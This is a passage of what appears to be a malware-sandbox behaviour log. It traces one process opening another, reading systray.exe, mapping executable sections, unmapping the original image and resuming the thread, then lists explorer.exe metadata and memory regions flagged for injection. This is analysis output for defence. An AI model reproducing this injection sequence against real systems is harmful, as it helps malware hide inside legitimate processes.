returned 0x0 [0278.369] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x19e05c | out: BaseAddress=0x19e05c*=0x75b50000) returned 0x0 [0278.401] PostThreadMessageW (idThread=0x680, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0278.463] NtDelayExecution (Alertable=0, Interval=0x19e0d4*=-30000000) returned 0x0 [0281.599] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x823f000, Buffer=0x19e0f8, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x19e0f8*, NumberOfBytesRead=0x0) returned 0x0 [0281.599] NtClose (Handle=0x80) returned 0x0 [0281.601] NtOpenProcess (in: ProcessHandle=0x19f1d4, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0xd14, UniqueThread=0x0) | out: ProcessHandle=0x19f1d4*=0x80) returned 0x0 [0281.605] NtOpenThread (in: ThreadHandle=0x19f1d8, DesiredAccess=0x1a, ObjectAttributes=0x19ea94, ClientId=0x19ea60*(UniqueProcess=0x0, UniqueThread=0xd18) | out: ThreadHandle=0x19f1d8*=0xb8) returned 0x0 [0281.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\systray.exe", NtPathName=0x19e098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\systray.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0281.641] NtCreateFile (in: FileHandle=0x19e0b8, DesiredAccess=0x120089, ObjectAttributes=0x19e080*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\systray.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e0a0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e0b8*=0xbc, IoStatusBlock=0x19e0a0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0281.641] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f80f8) returned 1 [0281.641] NtQueryInformationFile (in: FileHandle=0xbc, IoStatusBlock=0x19e0a0, FileInformation=0x19dff8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e0a0, FileInformation=0x19dff8) returned 0x0 [0281.642] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2a00) returned 0x4fa818 [0281.650] NtReadFile (in: FileHandle=0xbc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19e0a0, Buffer=0x4fa818, BufferLength=0x2600, ByteOffset=0x19e010*=0, Key=0x0 | out: IoStatusBlock=0x19e0a0, Buffer=0x4fa818*) returned 0x0 [0281.653] NtClose (Handle=0xbc) returned 0x0 [0281.653] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x6001) returned 0x4fd220 [0281.653] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa818) returned 1 [0281.653] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x0, ProcessInformation=0x19e404, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e404, ReturnLength=0x0) returned 0x0 [0281.654] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0x2f7008, Buffer=0x19efc8, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x19efc8*, NumberOfBytesRead=0x0) returned 0x0 [0281.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x470000, RegionSize=0x19eab0, FreeType=0x8000) returned 0x0 [0281.655] NtReadVirtualMemory (in: ProcessHandle=0x80, BaseAddress=0xbc0000, Buffer=0x4fd220, NumberOfBytesToRead=0x6000, NumberOfBytesRead=0x0 | out: Buffer=0x4fd220*, NumberOfBytesRead=0x0) returned 0x0 [0281.656] NtCreateSection (in: SectionHandle=0x19f264, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19f264*=0xbc) returned 0x0 [0281.656] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0xffffffff, BaseAddress=0x19f260*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19f260*=0x9a0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0281.657] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0x80, BaseAddress=0x19ed20*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed20*=0x110000, SectionOffset=0x0, ViewSize=0x19ef4c*=0x29000) returned 0x0 [0281.659] NtCreateSection (in: SectionHandle=0x19efc0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eac8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19efc0*=0xc0) returned 0x0 [0281.659] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0x19efc4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eac8*=0x6000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc4*=0x470000, SectionOffset=0x0, ViewSize=0x19eac8*=0x6000) returned 0x0 [0281.660] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fd220) returned 1 [0281.666] NtUnmapViewOfSection (ProcessHandle=0x80, BaseAddress=0xbc0000) returned 0x0 [0281.667] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0x80, BaseAddress=0x19efc8*=0xbc0000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f1f4*=0x6000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19efc8*=0xbc0000, SectionOffset=0x0, ViewSize=0x19f1f4*=0x6000) returned 0x0 [0281.677] NtResumeThread (in: ThreadHandle=0xb8, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0281.778] ExitProcess (uExitCode=0x0) Thread: id = 293 os_tid = 0xd10 Process: id = "96" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x29e4a000" os_pid = "0x67c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "95" os_parent_pid = "0x664" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010306" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8266 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8267 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8268 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8269 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8270 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 8271 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 8272 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8273 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8274 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8275 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8276 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8277 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8278 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8279 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8280 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8281 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8282 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 8283 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 8284 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 8285 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 8286 start_va = 0x5e0000 end_va = 0x5f7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 8287 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 8288 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8289 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 8290 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 8291 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 8292 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 8293 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 8294 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 8295 start_va = 0x1d90000 end_va = 0x218afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d90000" filename = "" Region: id = 8296 start_va = 0x2190000 end_va = 0x24c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8297 start_va = 0x24d0000 end_va = 0x24fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 8298 start_va = 0x2500000 end_va = 0x2501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 8299 start_va = 0x2510000 end_va = 0x2511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002510000" filename = "" Region: id = 8300 start_va = 0x2520000 end_va = 0x2521fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 8301 start_va = 0x2530000 end_va = 0x2533fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002530000" filename = "" Region: id = 8302 start_va = 0x2540000 end_va = 0x2546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 8303 start_va = 0x2550000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 8304 start_va = 0x25d0000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 8305 start_va = 0x2650000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 8306 start_va = 0x26d0000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 8307 start_va = 0x2750000 end_va = 0x282ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 8308 start_va = 0x2830000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 8309 start_va = 0x28b0000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 8310 start_va = 0x2930000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 8311 start_va = 0x29b0000 end_va = 0x2a6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029b0000" filename = "" Region: id = 8312 start_va = 0x2a70000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 8313 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 8314 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 8315 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 8316 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 8317 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 8318 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 8319 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 8320 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 8321 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 8322 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 8323 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 8324 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 8325 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 8326 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 8327 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 8328 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 8329 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 8330 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 8331 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 8332 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 8333 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 8334 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 8335 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 8336 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 8337 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 8338 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 8339 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 8340 start_va = 0x3ee0000 end_va = 0x3ee7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 8341 start_va = 0x3ef0000 end_va = 0x3ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ef0000" filename = "" Region: id = 8342 start_va = 0x3f00000 end_va = 0x3f01fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 8343 start_va = 0x3f10000 end_va = 0x3f10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 8344 start_va = 0x3f20000 end_va = 0x3f23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 8345 start_va = 0x3f30000 end_va = 0x3f48fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 8346 start_va = 0x3f50000 end_va = 0x3fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 8347 start_va = 0x3fd0000 end_va = 0x3fd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 8348 start_va = 0x3fe0000 end_va = 0x3fe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 8349 start_va = 0x3ff0000 end_va = 0x4034fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 8350 start_va = 0x4040000 end_va = 0x4043fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 8351 start_va = 0x4050000 end_va = 0x40ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 8352 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 8353 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 8354 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 8355 start_va = 0x41f0000 end_va = 0x4238fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 8356 start_va = 0x4240000 end_va = 0x4241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004240000" filename = "" Region: id = 8357 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 8358 start_va = 0x4260000 end_va = 0x4268fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 8359 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 8360 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 8361 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 8362 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 8363 start_va = 0x4470000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 8364 start_va = 0x44f0000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8365 start_va = 0x4cf0000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 8366 start_va = 0x4d70000 end_va = 0x5261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d70000" filename = "" Region: id = 8367 start_va = 0x5270000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 8368 start_va = 0x5370000 end_va = 0x5371fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 8369 start_va = 0x5380000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 8370 start_va = 0x5480000 end_va = 0x5480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 8371 start_va = 0x5490000 end_va = 0x5491fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 8372 start_va = 0x54a0000 end_va = 0x559ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 8373 start_va = 0x55a0000 end_va = 0x55a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055a0000" filename = "" Region: id = 8374 start_va = 0x55b0000 end_va = 0x55b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055b0000" filename = "" Region: id = 8375 start_va = 0x55c0000 end_va = 0x55c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 8376 start_va = 0x55d0000 end_va = 0x55d1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 8377 start_va = 0x55e0000 end_va = 0x56dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") 